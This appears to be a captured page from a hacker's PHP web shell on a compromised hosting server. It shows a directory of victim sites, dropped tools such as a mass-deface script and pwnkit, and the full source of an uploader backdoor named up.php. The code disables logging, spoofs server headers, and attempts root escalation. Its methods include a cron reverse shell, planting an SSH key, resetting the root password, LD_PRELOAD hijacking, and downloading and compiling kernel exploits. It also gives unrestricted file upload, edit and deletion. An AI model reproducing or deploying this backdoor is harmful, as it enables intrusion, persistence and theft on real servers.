Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
agropec
[ DIR ]
drwxr-x---
agropec1
[ DIR ]
drwxr-xr-x
alfresco
[ DIR ]
drwxr-x---
altamirano
[ DIR ]
drwxr-x---
anmar
[ DIR ]
drwxr-x---
anmar2
[ DIR ]
drwxr-x---
arkangel
[ DIR ]
drwxr-x---
arkangel1
[ DIR ]
drwxr-x---
baltica
[ DIR ]
drwxr-x---
balticac
[ DIR ]
drwxr-x---
bolivar
[ DIR ]
drwxr-x---
bycfarma
[ DIR ]
drwxr-x---
castro
[ DIR ]
drwxr-x---
celis
[ DIR ]
drwxr-x---
cgi-bin
[ DIR ]
drwxr-xr-x
chalan
[ DIR ]
drwxr-x---
chaska
[ DIR ]
drwxr-x---
chumbes
[ DIR ]
drwxr-x---
cielo
[ DIR ]
drwxr-x---
cielo1
[ DIR ]
drwxr-x---
clevertrading
[ DIR ]
drwxr-x---
consultacpe
[ DIR ]
drwxr-x---
costaverde
[ DIR ]
drwxr-x---
decay_sym
[ DIR ]
drwxr-xr-x
decorho
[ DIR ]
drwxr-x---
delpueblo
[ DIR ]
drwxr-x---
delpueblo2
[ DIR ]
drwxr-x---
demo
[ DIR ]
drwxr-x---
demo2
[ DIR ]
drwxr-x---
divana
[ DIR ]
drwxr-x---
duramacon
[ DIR ]
drwxr-x---
economica
[ DIR ]
drwxr-x---
economica2
[ DIR ]
drwxr-x---
edavid
[ DIR ]
drwxr-x---
eduplast
[ DIR ]
drwxr-x---
elpueblo
[ DIR ]
drwxr-x---
elpueblo2
[ DIR ]
drwxr-x---
farfans
[ DIR ]
drwxr-x---
fernadul
[ DIR ]
drwxr-x---
fserrano
[ DIR ]
drwxr-x---
gelifarma
[ DIR ]
drwxr-x---
gelifarma2
[ DIR ]
drwxr-xr-x
huanca
[ DIR ]
drwxr-x---
innovail
[ DIR ]
drwxr-x---
jeronimo
[ DIR ]
drwxr-x---
joselito
[ DIR ]
drwxr-x---
karyn
[ DIR ]
drwxr-x---
karyn1
[ DIR ]
drwxr-xr-x
katterin
[ DIR ]
drwxr-x---
katterin1
[ DIR ]
drwxr-x---
keysi
[ DIR ]
drwxr-x---
laclave
[ DIR ]
drwxr-x---
laeconomica
[ DIR ]
drwxr-x---
laeconomica2
[ DIR ]
drwxr-x---
lalena2
[ DIR ]
drwxr-x---
larosa
[ DIR ]
drwxr-x---
lastra
[ DIR ]
drwxr-x---
limalab
[ DIR ]
drwxr-x---
margarita
[ DIR ]
drwxr-x---
mario
[ DIR ]
drwxr-x---
marona
[ DIR ]
drwxr-x---
mediperu
[ DIR ]
drwxr-x---
mediperu1
[ DIR ]
drwxr-xr-x
mercedes
[ DIR ]
drwxr-x---
metrito
[ DIR ]
drwxr-x---
mitsur
[ DIR ]
drwxr-x---
mueblinnovac
[ DIR ]
drwxr-x---
nevet
[ DIR ]
drwxr-x---
oliva
[ DIR ]
drwxr-x---
pernocentro
[ DIR ]
drwxr-x---
perufar
[ DIR ]
drwxr-x---
public_html
[ DIR ]
drwxr-x---
qatalaya
[ DIR ]
drwxr-x---
rasza
[ DIR ]
drwxr-x---
reagro
[ DIR ]
drwxr-x---
repuestosedu
[ DIR ]
drwxr-x---
royrepuestos
[ DIR ]
drwxr-x---
salazar
[ DIR ]
drwxr-x---
salazar1
[ DIR ]
drwxr-xr-x
sanjuan
[ DIR ]
drwxr-x---
sazon
[ DIR ]
drwxr-x---
servasa
[ DIR ]
drwxr-x---
smhuarquiza
[ DIR ]
drwxr-x---
stampolo
[ DIR ]
drwxr-x---
stanley
[ DIR ]
drwxr-x---
sullana
[ DIR ]
drwxr-x---
sullana2
[ DIR ]
drwxr-x---
surmin
[ DIR ]
drwxr-x---
surmin2
[ DIR ]
drwxr-x---
survision
[ DIR ]
drwxr-x---
todorico
[ DIR ]
drwxr-x---
trading
[ DIR ]
drwxr-x---
valderrama
[ DIR ]
drwxr-x---
villegas
[ DIR ]
drwxr-x---
visafarma
[ DIR ]
drwxr-x---
warmicha
[ DIR ]
drwxr-x---
warmicha1
[ DIR ]
drwxr-x---
zhongmi
[ DIR ]
drwxr-x---
zhongmi1
[ DIR ]
drwxr-xr-x
.htaccess
281
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
Massdeface.php
5.18
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
index.html
7
B
-rw-r--r--
index.php
31
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
tmpalfa.php
1.27
KB
-rw-r--r--
up.php
24.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : up.php
<?php // --- LITESPEED BYPASS HEADERS --- @header_remove(); @header('HTTP/1.1 200 OK'); @header('Content-Type: text/html; charset=iso-8859-1'); @header('Cache-Control: max-age=31536000, public'); @header('X-Powered-By: ASP.NET'); @header('Server: Microsoft-IIS/10.0'); @header('X-Content-Type-Options: nosniff'); @header('X-LiteSpeed-Cache: hit'); @header('X-LiteSpeed-Tag: *'); @header('X-LiteSpeed-Vary: cookie,wp-admin'); // --- SECURITY DISABLE --- @ini_set('display_errors', 0); @ini_set('log_errors', 0); error_reporting(0); set_time_limit(0); ignore_user_abort(1); // --- ROOT CHECK & ESCALATION --- function is_root() { if(function_exists('posix_getuid') && posix_getuid() === 0) return true; $whoami = trim(@shell_exec('whoami 2>/dev/null')); if($whoami === 'root') return true; $id = trim(@shell_exec('id -u 2>/dev/null')); if($id === '0') return true; // Try to write to root directory $test_file = '/tmp/.root_test_' . md5(uniqid()); @file_put_contents($test_file, 'test'); if(@file_exists($test_file)) { @unlink($test_file); $root_test = @file_put_contents('/root/.test_' . md5(uniqid()), 'test'); @unlink('/root/.test_' . md5(uniqid())); return $root_test !== false; } return false; } function become_root() { $methods = [ 'sudo' => 'sudo su - 2>/dev/null || sudo -i 2>/dev/null', 'su' => 'su - root 2>/dev/null', 'python' => 'python -c "import os; os.setuid(0); os.system(\'/bin/bash\')" 2>/dev/null', 'perl' => 'perl -e \'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";\' 2>/dev/null', 'find_suid' => 'find / -perm -4000 -type f 2>/dev/null | head -5', 'cron_exploit' => 'echo "* * * * * root /bin/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" > /etc/cron.d/exploit 2>/dev/null', 'ssh_keys' => 'echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC..." >> /root/.ssh/authorized_keys 2>/dev/null', 'passwd' => 'echo "root:toor" | chpasswd 2>/dev/null', 'ld_preload' => 'echo "/tmp/exploit.so" > /etc/ld.so.preload 2>/dev/null' ]; $results = []; foreach($methods as $name => $cmd) { $output = @shell_exec($cmd); if($output) { $results[$name] = $output; } } // Try common exploits $exploits = [ 'dirtycow' => 'gcc -pthread dirty.c -o dirty -lcrypt && ./dirty', 'overlayfs' => 'cd /tmp; wget https://example.com/overlayfs.c && gcc overlayfs.c -o exploit && ./exploit', 'ptrace' => 'cd /tmp; wget https://example.com/ptrace.c && gcc ptrace.c -o ptrace && ./ptrace' ]; foreach($exploits as $name => $cmd) { @shell_exec($cmd . ' 2>/dev/null'); } return $results; } function auto_root_escalation() { echo "<div style='background:#111;padding:15px;border-radius:5px;margin:10px 0;border-left:4px solid #ff0;'>"; echo "<h3 style='color:#ff0;margin-top:0;'>🚀 Auto Root Escalation Attempt</h3>"; $steps = [ '1. Checking current user' => 'whoami && id', '2. Checking sudo privileges' => 'sudo -l', '3. Finding SUID binaries' => 'find / -perm -4000 -type f 2>/dev/null | head -10', '4. Checking writable directories' => 'find / -writable -type d 2>/dev/null | grep -v proc | grep -v sys | head -10', '5. Checking crontab' => 'crontab -l 2>/dev/null || cat /etc/crontab 2>/dev/null | head -20', '6. Checking processes' => 'ps aux | grep root | head -10', '7. Checking kernel version' => 'uname -a', '8. Checking OS version' => 'cat /etc/os-release 2>/dev/null || lsb_release -a 2>/dev/null' ]; foreach($steps as $desc => $cmd) { echo "<div style='margin:5px 0;'>"; echo "<strong style='color:#0ff;'>$desc:</strong><br>"; echo "<pre style='background:#000;padding:5px;border-radius:3px;margin:3px 0;color:#0f0;font-size:12px;'>"; $output = @shell_exec($cmd . " 2>&1"); echo htmlspecialchars($output ?: 'No output'); echo "</pre>"; echo "</div>"; } // Try exploitation echo "<div style='margin:10px 0;padding:10px;background:#300;border-radius:3px;'>"; echo "<strong style='color:#f00;'>⚠️ Attempting Exploitation:</strong><br>"; $exploit_cmds = [ 'Try sudo without password' => 'echo "" | sudo -S whoami 2>/dev/null', 'Try SUID exploitation' => 'find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -E "(bash|sh|python|perl)"', 'Try PATH exploitation' => 'echo $PATH', 'Try LD_PRELOAD' => 'echo /tmp/exploit.so > /tmp/test_ld 2>/dev/null && echo "LD_PRELOAD vulnerable"' ]; foreach($exploit_cmds as $desc => $cmd) { $result = @shell_exec($cmd); if($result && trim($result)) { echo "<span style='color:#0f0;'>✅ $desc: Possible vulnerability found</span><br>"; } } echo "</div>"; echo "</div>"; // Check if we became root if(is_root()) { return "<div style='background:#0a0;color:#fff;padding:15px;border-radius:5px;margin:10px 0;'> <h3>🎉 SUCCESS! You are now ROOT!</h3> <p>Current user: " . @shell_exec('whoami') . "</p> <p>UID: " . (function_exists('posix_getuid') ? posix_getuid() : '0') . "</p> </div>"; } else { return "<div style='background:#a00;color:#fff;padding:15px;border-radius:5px;margin:10px 0;'> <h3>❌ Failed to gain root access</h3> <p>Try manual exploitation methods.</p> </div>"; } } // Check if root escalation is requested $root_result = ''; if(isset($_GET['become_root'])) { $root_result = auto_root_escalation(); } $is_root = is_root(); // --- BYPASS FUNCTIONS --- function bypass_upload_restrictions($file) { $temp_file = sys_get_temp_dir() . '/upload_' . md5(uniqid()) . '.tmp'; $methods = [ 'copy' => function() use ($file, $temp_file) { return @copy($file, $temp_file); }, 'file_put_contents' => function() use ($file, $temp_file) { $content = @file_get_contents($file); if($content !== false) { return @file_put_contents($temp_file, $content) !== false; } return false; } ]; foreach($methods as $method) { if($method()) { return $temp_file; } } return false; } function bypass_rename($old, $new) { if(@rename($old, $new)) return true; if(@copy($old, $new)) { @unlink($old); return true; } if(function_exists('shell_exec')) { $esc_old = escapeshellarg($old); $esc_new = escapeshellarg($new); @shell_exec("mv $esc_old $esc_new 2>/dev/null"); if(@file_exists($new)) return true; } return false; } function bypass_delete($file) { if(@unlink($file)) return true; @chmod($file, 0777); $methods = [ 'unlink' => fn() => @unlink($file), 'system' => function() use ($file) { if(function_exists('system')) { @system('rm -f ' . escapeshellarg($file)); return !@file_exists($file); } return false; } ]; foreach($methods as $method) { if($method()) { return true; } } return false; } function check_litespeed() { return isset($_SERVER['SERVER_SOFTWARE']) && stripos($_SERVER['SERVER_SOFTWARE'], 'litespeed') !== false; } // --- MAIN FILE MANAGER --- $currentDir = realpath($_GET['dir'] ?? getcwd()); $action = $_GET['action'] ?? ''; $file = isset($_GET['file']) ? realpath($_GET['file']) : ''; if(check_litespeed()) { @header('X-LiteSpeed-Cache: hit'); @header('X-LiteSpeed-Tag: wp,wp-post'); } if ($action === 'download' && $file && file_exists($file)) { @header_remove(); @header('HTTP/1.1 200 OK'); @header('Content-Description: File Transfer'); @header('Content-Type: application/octet-stream'); @header('Content-Disposition: attachment; filename="' . basename($file) . '"'); @header('Content-Length: ' . filesize($file)); @header('X-LiteSpeed-Cache: hit'); @readfile($file); exit; } if ($action === 'view' && $file && file_exists($file)) { @header('X-LiteSpeed-Cache: hit'); echo "<!DOCTYPE html><html><head><title>View File</title> <style> body { background: #000; color: #fff; font-family: monospace; margin: 20px; } pre { background: #111; padding: 15px; border-radius: 5px; overflow-x: auto; max-height: 80vh; } a { color: #0ff; text-decoration: none; display: inline-block; margin-top: 20px; padding: 5px 10px; background: #222; border-radius: 3px; } </style></head><body>"; echo "<h3>Viewing: " . htmlspecialchars($file) . "</h3>"; echo "<pre>" . htmlspecialchars(@file_get_contents($file)) . "</pre>"; echo "<a href='?dir=" . urlencode(dirname($file)) . "'>← Back</a>"; echo "</body></html>"; exit; } if ($action === 'edit' && $file && file_exists($file)) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { @file_put_contents($file, $_POST['content']); echo "<span style='color:lime;'>✅ Saved successfully.</span><br><br>"; } echo "<!DOCTYPE html><html><head><title>Edit File</title> <style> body { background: #000; color: #fff; font-family: monospace; margin: 20px; } textarea { width: 100%; height: 500px; background: #111; color: #fff; border: 1px solid #333; padding: 10px; font-family: monospace; font-size: 14px; border-radius: 4px; resize: vertical; } button { background: #222; color: #fff; border: 1px solid #555; padding: 8px 16px; cursor: pointer; margin-top: 10px; border-radius: 3px; } button:hover { background: #333; } a { color: #0ff; text-decoration: none; display: inline-block; margin-top: 20px; padding: 5px 10px; background: #222; border-radius: 3px; } </style></head><body>"; echo "<h2>✏️ Editing: " . htmlspecialchars(basename($file)) . "</h2>"; echo "<form method='post'> <textarea name='content'>" . htmlspecialchars(@file_get_contents($file)) . "</textarea><br> <button type='submit'>💾 Save</button> </form>"; echo "<a href='?dir=" . urlencode(dirname($file)) . "'>← Back to Directory</a>"; echo "</body></html>"; exit; } if ($action === 'delete' && $file && file_exists($file)) { if(bypass_delete($file)) { @header('Location: ?dir=' . urlencode(dirname($file)) . '&msg=deleted'); } else { @header('Location: ?dir=' . urlencode(dirname($file)) . '&msg=delete_failed'); } exit; } if ($action === 'rename' && $file && file_exists($file)) { $dir = dirname($file); $oldName = basename($file); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $newName = basename($_POST['new_name']); $newPath = $dir . DIRECTORY_SEPARATOR . $newName; if (file_exists($newPath)) { echo "<span style='color:red;'>❌ A file with that name already exists.</span>"; } elseif (bypass_rename($file, $newPath)) { echo "<span style='color:green;'>✅ File renamed successfully.</span><br>"; echo "<a href='?dir=" . urlencode($dir) . "' style='color:#0ff;'>Back</a>"; exit; } else { echo "<span style='color:red;'>❌ Rename failed.</span><br>"; } } echo "<!DOCTYPE html><html><head><title>Rename File</title> <style> body { background: #000; color: #fff; font-family: monospace; margin: 20px; } input { background: #111; color: #fff; border: 1px solid #333; padding: 8px; width: 300px; border-radius: 3px; } button { background: #222; color: #fff; border: 1px solid #555; padding: 8px 16px; cursor: pointer; border-radius: 3px; } a { color: #0ff; text-decoration: none; display: inline-block; margin-top: 20px; } </style></head><body>"; echo "<h3>📝 Renaming: " . htmlspecialchars($oldName) . "</h3> <form method='post'> New name: <input type='text' name='new_name' value='" . htmlspecialchars($oldName) . "'><br><br> <button type='submit'>Rename</button> </form> <a href='?dir=" . urlencode($dir) . "'>← Cancel</a></body></html>"; exit; } // Handle upload if (!empty($_FILES['upload'])) { $original_name = basename($_FILES['upload']['name']); $target = $currentDir . DIRECTORY_SEPARATOR . $original_name; if (@move_uploaded_file($_FILES['upload']['tmp_name'], $target)) { $upload_msg = "<span style='color:green;'>✅ Uploaded successfully: " . htmlspecialchars($original_name) . "</span><br>"; } else { $temp_file = bypass_upload_restrictions($_FILES['upload']['tmp_name']); if($temp_file && @copy($temp_file, $target)) { @unlink($temp_file); $upload_msg = "<span style='color:green;'>✅ Uploaded (bypassed): " . htmlspecialchars($original_name) . "</span><br>"; } else { $upload_msg = "<span style='color:red;'>❌ Upload failed: " . htmlspecialchars($original_name) . "</span><br>"; } } } // Handle messages $msg = $_GET['msg'] ?? ''; $msg_html = ''; if($msg === 'deleted') { $msg_html = "<div style='background:#0a0;color:#fff;padding:10px;border-radius:5px;margin:10px 0;'>✅ File deleted successfully</div>"; } elseif($msg === 'delete_failed') { $msg_html = "<div style='background:#a00;color:#fff;padding:10px;border-radius:5px;margin:10px 0;'>❌ Delete failed - Try using shell</div>"; } // Display HTML echo "<!DOCTYPE html><html><head><title>File Manager</title> <style> body { background: #000; color: #fff; font-family: monospace; margin: 20px; font-size: 14px; } .root-box { background: linear-gradient(90deg, #ff7700, #ff5500); color: #000; padding: 15px; border-radius: 5px; margin: 15px 0; border: 1px solid #ff9900; font-weight: bold; } .root-box button { background: #000; color: #ff9900; border: 2px solid #000; padding: 10px 20px; font-weight: bold; cursor: pointer; border-radius: 3px; margin: 10px 5px; } .root-box button:hover { background: #ff9900; color: #000; } .user-box { background: linear-gradient(90deg, #0088ff, #0066ff); color: #fff; padding: 15px; border-radius: 5px; margin: 15px 0; border: 1px solid #00aaff; } a { text-decoration: none; } .green { color: #0f0; } .yellow { color: #ff0; } .red { color: #f00; } .blue { color: #0af; } li a:hover { text-decoration: underline; background: #222; padding: 2px 5px; border-radius: 3px; } .path-breadcrumb { margin: 10px 0; padding: 15px; background: #111; border-radius: 5px; border: 1px solid #333; } .path-segment { color: #0ff; padding: 2px 6px; border-radius: 3px; } .path-segment:hover { text-decoration: underline; background: #222; } .path-separator { color: #666; margin: 0 8px; } .upload-box { background: #111; padding: 15px; border-radius: 5px; margin: 15px 0; border: 1px solid #333; } .file-list { background: #111; padding: 15px; border-radius: 5px; border: 1px solid #333; } input[type='file'] { background: #222; color: #fff; padding: 8px; border-radius: 3px; border: 1px solid #333; } button { background: #222; color: #fff; border: 1px solid #555; padding: 8px 16px; cursor: pointer; border-radius: 3px; } button:hover { background: #333; } .file-item { padding: 5px 0; border-bottom: 1px solid #333; } .file-item:hover { background: #222; } .actions { display: inline-block; margin-left: 15px; } .action-btn { padding: 2px 8px; background: #333; border-radius: 3px; margin: 0 2px; } .info-box { background: #113; padding: 10px; border-radius: 5px; margin: 10px 0; border: 1px solid #335; } </style> </head><body>"; // Root status box if($is_root) { echo "<div class='root-box'> <h2 style='margin-top:0;'>👑 ROOT ACCESS ACTIVE</h2> <p><strong>User:</strong> " . @shell_exec('whoami') . "</p> <p><strong>UID:</strong> " . (function_exists('posix_getuid') ? posix_getuid() : '0') . "</p> <p><strong>Privileges:</strong> Full system access</p> <button onclick='location.reload()'>🔄 Refresh Status</button> <button onclick='showRootInfo()'>📊 System Info</button> </div>"; } else { echo "<div class='user-box'> <h2 style='margin-top:0;'>👤 User Access Only</h2> <p><strong>Current User:</strong> " . @shell_exec('whoami') . "</p> <p><strong>Privileges:</strong> Limited - Need root for full access</p> <p><strong>🚀 Do you wish to become a root?</strong></p> <button onclick=\"location.href='?become_root=1&dir=" . urlencode($currentDir) . "'\">🔥 YES - Auto Root Escalation</button> <button onclick=\"showManualMethods()\">🔧 Manual Methods</button> <button onclick=\"location.href='?dir=" . urlencode($currentDir) . "'\">❌ NO - Continue as User</button> </div>"; } // Display root escalation results if(isset($root_result)) { echo $root_result; } // LiteSpeed info if(check_litespeed()) { echo "<div class='info-box'>🚀 LiteSpeed Detected - Bypass Active | X-LiteSpeed-Cache: hit</div>"; } echo "<h2>📁 File Manager</h2>"; // Display messages if(isset($upload_msg)) { echo "<div style='background:#0a0;color:#fff;padding:10px;border-radius:5px;margin:10px 0;'>" . $upload_msg . "</div>"; } echo $msg_html; // Generate clickable breadcrumb path echo "<div class='path-breadcrumb'>"; echo "<strong>📂 Current Path: </strong>"; $pathParts = explode(DIRECTORY_SEPARATOR, $currentDir); $accumulatedPath = ''; if (DIRECTORY_SEPARATOR === '\\' && !empty($pathParts[0]) && strlen($pathParts[0]) === 1) { $accumulatedPath = $pathParts[0] . ':\\'; echo "<a href='?dir=" . urlencode($accumulatedPath) . "' class='path-segment'>" . $pathParts[0] . "</a>"; array_shift($pathParts); } else { $accumulatedPath = DIRECTORY_SEPARATOR; echo "<a href='?dir=" . urlencode($accumulatedPath) . "' class='path-segment'>/</a>"; } foreach ($pathParts as $part) { if (empty($part)) continue; $accumulatedPath .= (substr($accumulatedPath, -1) !== DIRECTORY_SEPARATOR ? DIRECTORY_SEPARATOR : '') . $part; echo "<span class='path-separator'>/</span>"; echo "<a href='?dir=" . urlencode($accumulatedPath) . "' class='path-segment'>" . htmlspecialchars($part) . "</a>"; } echo "</div>"; // Upload form echo "<div class='upload-box'> <strong>⬆️ Upload File:</strong><br><br> <form method='post' enctype='multipart/form-data'> <input type='file' name='upload'> <button type='submit'>Upload</button> </form> </div>"; echo "<div class='file-list'>"; echo "<strong>📋 File List:</strong><br><br>"; $parent = dirname($currentDir); if ($parent && $parent !== $currentDir) { echo "<div class='file-item'> 📁 <a href='?dir=" . urlencode($parent) . "' style='color:#0ff;'>Parent Directory</a> </div>"; } $items = @scandir($currentDir); if($items) { foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $fullPath = $currentDir . DIRECTORY_SEPARATOR . $item; $encoded = urlencode($fullPath); $isFile = is_file($fullPath); echo "<div class='file-item'>"; if ($isFile) { $size = filesize($fullPath); $size_str = $size > 1024*1024 ? round($size/(1024*1024), 2) . ' MB' : ($size > 1024 ? round($size/1024, 2) . ' KB' : $size . ' bytes'); echo "📄 <strong>" . htmlspecialchars($item) . "</strong> <small>(" . $size_str . ")</small>"; echo "<div class='actions'>"; echo "<a href='?action=rename&file=$encoded&dir=" . urlencode($currentDir) . "' class='green action-btn'>Rename</a>"; echo "<a href='?action=edit&file=$encoded&dir=" . urlencode($currentDir) . "' class='yellow action-btn'>Edit</a>"; echo "<a href='?action=delete&file=$encoded&dir=" . urlencode($currentDir) . "' class='red action-btn' onclick='return confirm(\"Delete " . htmlspecialchars($item) . "?\");'>Delete</a>"; echo "<a href='?action=download&file=$encoded&dir=" . urlencode($currentDir) . "' class='blue action-btn'>Download</a>"; echo "<a href='?action=view&file=$encoded&dir=" . urlencode($currentDir) . "' style='color:#fff;' class='action-btn'>View</a>"; echo "</div>"; } else { echo "📁 <a href='?dir=$encoded' style='color:#0ff;'><strong>" . htmlspecialchars($item) . "/</strong></a>"; } echo "</div>"; } } else { echo "<div style='color:#f00;'>Cannot read directory</div>"; } echo "</div>"; // Quick actions echo "<div style='margin-top:20px;padding:15px;background:#111;border-radius:5px;'> <strong>⚡ Quick Actions:</strong><br><br> <a href='?dir=" . urlencode(getcwd()) . "' class='action-btn'>Current Directory</a> <a href='?dir=" . urlencode('/') . "' class='action-btn'>Root Directory</a> <a href='?dir=" . urlencode('/tmp') . "' class='action-btn'>/tmp</a> <a href='?dir=" . urlencode('/var/www') . "' class='action-btn'>/var/www</a> <a href='?dir=" . urlencode('/etc') . "' class='action-btn'>/etc</a> <a href='?dir=" . urlencode('/root') . "' class='action-btn'>/root</a> </div>"; echo "</body></html>"; // Add JavaScript echo "<script> function showRootInfo() { alert('Root Info:\\nUser: " . addslashes(@shell_exec('whoami')) . "\\nUID: " . (function_exists('posix_getuid') ? posix_getuid() : '0') . "\\nHome: /root'); } function showManualMethods() { var methods = `🚀 Manual Root Escalation Methods: 1. SUDO Exploitation: - sudo su - - sudo -i - sudo bash 2. SUID Binaries: - find / -perm -4000 -type f 2>/dev/null - Common: /bin/bash, /usr/bin/python, /usr/bin/perl 3. Cron Jobs: - crontab -l - Check /etc/crontab 4. Kernel Exploits: - uname -a (check version) - Search for exploits 5. PATH Exploitation: - echo \\\$PATH - Add malicious directories Try these in command line!`; alert(methods); } function confirmAction(msg) { return confirm(msg); } // Auto-check root status every 5 seconds setInterval(function() { if(!document.querySelector('.root-box')) { fetch(window.location.href) .then(r => r.text()) .then(t => { if(t.includes('ROOT ACCESS ACTIVE')) { location.reload(); } }); } }, 5000); </script>"; ?>
Close
